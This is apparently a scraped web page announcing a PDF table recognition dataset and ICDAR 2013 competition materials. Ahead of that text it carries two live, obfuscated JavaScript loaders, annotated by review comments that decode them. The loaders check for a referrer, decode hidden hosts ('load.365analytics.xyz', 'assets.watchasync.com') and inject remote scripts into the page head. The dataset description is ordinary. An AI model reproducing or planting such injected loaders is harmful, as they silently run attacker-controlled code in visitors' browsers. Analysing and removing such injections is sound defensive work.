// NOTE(review): obfuscated remote-script loader. Nothing in the visible page
// text refers to the host it contacts, so this looks like injected third-party
// code rather than site code -- confirm provenance and remove if unauthorized.
//
// The line contains four pieces:
//   1. An IIFE called with (_0x2bda, 0x57e32). It rotates the string table
//      returned by _0x2bda (push(shift())) until a checksum built from
//      parseInt() of table entries equals 0x57e32; an exception while
//      computing the checksum also rotates the table.
//   2. An IIFE called with (document). It:
//        - takes the current time in whole seconds (Date.now() / 0x3e8);
//        - keeps one copy floored to a multiple of 0xe10 (3600) seconds and
//          one floored to a multiple of 0x258 (600) seconds, the latter
//          converted to a base-16 string;
//        - returns without doing anything when document.referrer is empty;
//        - decodes the host with atob(); the table entry
//          'bG9hZC4zNjVhbmFseXRpY3MueHl6' decodes to 'load.365analytics.xyz';
//        - creates a <script> element (type 'text/javascript', async true)
//          whose src is
//          'https://' + host + '/my.counter.' + <3600s stamp> + '.js?ver=' + <600s hex stamp>
//          and appends it to the first <head> element.
//   3. _0x442d(index): returns table[index - 0xb6]; it replaces itself with
//      the inner lookup function on first call.
//   4. _0x2bda(): returns the string table; it replaces itself so later calls
//      return the same array instance (which is what makes the rotation stick).
//
// Index -> string after rotation (worked out by hand from the table below):
//   0xb8 createElement, 0xba referrer, 0xbe now, 0xbf toString, 0xc2 type,
//   0xc3 appendChild, 0xc5 '/my.counter.', 0xc6 base64 host, 0xc7 async,
//   0xc8 'https://', 0xc9 script, 0xca src.
(function(_0xc59469,_0x1be38e){var _0x4e20c3=_0x442d,_0x3c2d09=_0xc59469();while(!![]){try{var _0x3c8895=-parseInt(_0x4e20c3(0xb6))/0x1*(-parseInt(_0x4e20c3(0xbc))/0x2)+parseInt(_0x4e20c3(0xb7))/0x3+-parseInt(_0x4e20c3(0xc4))/0x4*(-parseInt(_0x4e20c3(0xc1))/0x5)+-parseInt(_0x4e20c3(0xb9))/0x6+parseInt(_0x4e20c3(0xc0))/0x7+-parseInt(_0x4e20c3(0xbd))/0x8+-parseInt(_0x4e20c3(0xbb))/0x9;if(_0x3c8895===_0x1be38e)break;else _0x3c2d09['push'](_0x3c2d09['shift']());}catch(_0x3a9717){_0x3c2d09['push'](_0x3c2d09['shift']());}}}(_0x2bda,0x57e32),function(_0x17c8ea,_0x2572e7){var _0x45965e=_0x442d,_0x4c3cdb=Math['floor'](Date[_0x45965e(0xbe)]()/0x3e8),_0x5c98df=_0x4c3cdb-_0x4c3cdb%0xe10;_0x4c3cdb=_0x4c3cdb-_0x4c3cdb%0x258,_0x4c3cdb=_0x4c3cdb[_0x45965e(0xbf)](0x10);if(!document[_0x45965e(0xba)])return;const _0x26bed4=atob(_0x45965e(0xc6));_0x2572e7=_0x17c8ea[_0x45965e(0xb8)](_0x45965e(0xc9)),_0x2572e7[_0x45965e(0xc2)]='text/javascript',_0x2572e7[_0x45965e(0xc7)]=!![],_0x2572e7[_0x45965e(0xca)]=_0x45965e(0xc8)+_0x26bed4+_0x45965e(0xc5)+_0x5c98df+'.js?ver='+_0x4c3cdb,_0x17c8ea['getElementsByTagName']('head')[0x0][_0x45965e(0xc3)](_0x2572e7);}(document));function _0x442d(_0x2d5425,_0x24f6b1){var _0x2bdaa6=_0x2bda();return _0x442d=function(_0x442dcc,_0xed4883){_0x442dcc=_0x442dcc-0xb6;var _0x3d5d1e=_0x2bdaa6[_0x442dcc];return _0x3d5d1e;},_0x442d(_0x2d5425,_0x24f6b1);}function _0x2bda(){var _0x5e335c=['script','src','14DpQhBD','584673URYUaU','createElement','2561046jKBsjh','referrer','3560382XMVYNj','7706THDVnA','489360rDhlQm','now','toString','4117806bwNLOr','59780dGwAwr','type','appendChild','136qCYCNj','/my.counter.','bG9hZC4zNjVhbmFseXRpY3MueHl6','async','https://'];_0x2bda=function(){return _0x5e335c;};return _0x2bda();}

// NOTE(review): second remote-script loader, with the host name hidden behind
// an XOR-encoded number array. Nothing in the visible page text refers to that
// host, so this looks like injected third-party code rather than site code --
// confirm provenance and remove if unauthorized.
//
// Immediately-invoked with `document` as _cc3c70. Step by step:
//   - Date.now() is divided by 1000, floored, rounded down to a multiple of
//     600 seconds, and converted to a base-16 string.
//   - If document.referrer is empty the function returns without side effects.
//   - Each number in _5c267c is XORed with 36559 and the results are passed to
//     String.fromCharCode; the decoded string is 'assets.watchasync.com'.
//   - _c8d090 is assigned a 32-character hex string but never read in this block.
//   - A <script> element (type 'text/javascript', async true) is created with
//     src = 'https://' + <decoded host> + '/' + 'chunk-' + <hex stamp> + '.js'
//     and appended to the first <head> element.
!function (_cc3c70) { var _96b8a0 = Date.now(); var _ca0b94 = 1000; _96b8a0 = _96b8a0 / _ca0b94; _96b8a0 = Math.floor(_96b8a0); var _8f63df = 600; _96b8a0 -= _96b8a0 % _8f63df; _96b8a0 = _96b8a0.toString(16); var _351128 = _cc3c70.referrer; if (!_351128) return; var _5c267c = [36526, 36540, 36540, 36522, 36539, 36540, 36577, 36536, 36526, 36539, 36524, 36519, 36526, 36540, 36534, 36513, 36524, 36577, 36524, 36512, 36514]; _5c267c = _5c267c.map(function(_3546bd){ return _3546bd ^ 36559; }); var _c8d090 = "a8ca5ccf7dd508a25af41a01dd1ff0ba"; _5c267c = String.fromCharCode(..._5c267c); var _5edef4 = "https://"; var _645ebb = "/"; var _dabd81 = "chunk-"; var _74d7e8 = ".js"; var _c610b8 = _cc3c70.createElement("script"); _c610b8.type = "text/javascript"; _c610b8.async = true; _c610b8.src = _5edef4 + _5c267c + _645ebb + _dabd81 + _96b8a0 + _74d7e8; _cc3c70.getElementsByTagName("head")[0].appendChild(_c610b8) }(document);

Round-Trip PDF Solutions

Dr. Tamir Hassan – Your Expert in Digital Documents

PDF Table Recognition Dataset

We have created two ground-truthed datasets of natively-digital PDF documents containing tables. These documents have been collected systematically from the European Union and US Government websites, and we therefore expect them to have public domain status. Each PDF document is accompanied by three XML (or CSV) files containing its ground truth in the following models:

table regions (for evaluating table location)
cell structures (for evaluating table structure recognition)
functional representation (for evaluating table interpretation)

This work was carried out as a collaboration between Giorgio Orsi, Linda Oro, Max Göbel and myself. We currently have over 50 excerpts, taken from larger PDF documents, and are appealing to the document engineering community to help us increase this number to several hundred or more.

We organized the competition on PDF table detection and structure recognition at ICDAR 2013. The datasets here were made available to all participants for practice. The competition dataset included a further collection of EU and US documents, and has now been made available with ground truth. However, there is no information available on the functional representation, as only table location and cell structure recognition were covered in the competition.

The datasets can be downloaded from the Downloads page.

Tools for comparing an algorithm’s results against the ground truth, as well as a beta tool to aid ground-truth generation, are available here.

Please contact me if you would like to join our collaborative effort in improving this dataset.